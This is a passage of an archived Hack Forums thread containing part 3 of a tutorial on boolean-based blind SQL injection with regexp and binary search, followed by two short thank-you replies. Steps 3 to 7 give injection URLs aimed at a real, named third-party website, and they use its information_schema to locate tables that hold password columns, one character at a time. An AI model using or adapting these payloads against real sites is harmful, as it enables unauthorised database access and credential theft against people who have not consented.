table_name regexp concat('^[',CHAR(101),'-',CHAR(122),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 3</span> - ascii range to search: 79 - 101; mid=90</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp '^pass' and 
table_name regexp concat('^[',CHAR(90),'-',CHAR(101),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 4</span> - ascii range to search: 90 - 101; mid=96</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp '^pass' and 
table_name regexp concat('^[',CHAR(96),'-',CHAR(101),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 5</span> - ascii range to search: 96 - 101; mid=99</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp '^pass' and 
table_name regexp concat('^[',CHAR(99),'-',CHAR(101),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 6</span> - ascii range to search: 96 - 99; mid=98</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp '^pass' and 
table_name regexp concat('^[',CHAR(98),'-',CHAR(99),']') limit 0,1)-- -</code></div></div>response <span style="color: #32CD32;">true</span><br><br><span style="font-weight: bold;"><span style="color: #FFA500;">Step 7</span> - ascii range to search: 98 - 99; mid=99</span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.cirs.fr/researchers/researchers.php?id=73'
 and 1=(select 1 from information_schema.columns where 
table_schema!='information_schema' and column_name regexp '^pass' and 
table_name regexp concat('^[',CHAR(99),'-',CHAR(99),']') limit 0,1)-- -</code></div></div>response <span style="color: #FF4500;">false</span> - so we know first character of table name with column pass is with ascii value 98 --&gt; <span style="color: #32CD32;">b</span> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br>We already know how to proceed with searching second character in table name with column name <span style="color: #32CD32;">pass</span> (adding letter <span style="color: #32CD32;">b</span> to our second regexp (after table_name) like <span style="color: #FFD700;">regexp '^b[x-y]' </span>where value x and y will be replaced with ascii values for different ranges of binary searching <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"><br><br>In next <a href="http://www.hackforums.net/showthread.php?tid=3387811" target="_blank">part #4</a>
 of this tutorial we will be searching for table names using boolean 
based blind SQLi with regexp and binary search. We will have to convert 
regexp syntax to hex because magic_quotes_gpc directive of example page 
will be turned on.<br><br><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_31777589"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387759&amp;replyto=31777589" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31803060" id="pid31803060"></a><table class="tborder" style="margin-top: 5px; " id="post_31803060" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-07-2013, 02:26 PM <span id="edited_by_31803060"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387759&amp;pid=31803060#pid31803060">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1758777"><span class="group2">FireKode</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 11<br>Joined: Apr 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1758777"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31803060">very useful i would say thinks a lot</div><div class="post_meta" id="post_meta_31803060"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1758777" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387759&amp;replyto=31803060" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31837111" id="pid31837111"></a><table class="tborder" style="margin-top: 5px; " id="post_31837111" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-08-2013, 10:46 PM <span id="edited_by_31837111"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3387759&amp;pid=31837111#pid31837111">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=852281"><span class="group2">Patalach</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 9<br>Posts: 69<br>Joined: Jun 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=852281"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31837111">Very good again. High quality [TUT].<br>Thank you ajkaro. </div><div class="post_meta" id="post_meta_31837111"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=852281" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387759&amp;replyto=31837111" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3387759&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3387759&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3387759" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3387759">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3387759" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3387759&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3387759.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%233%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->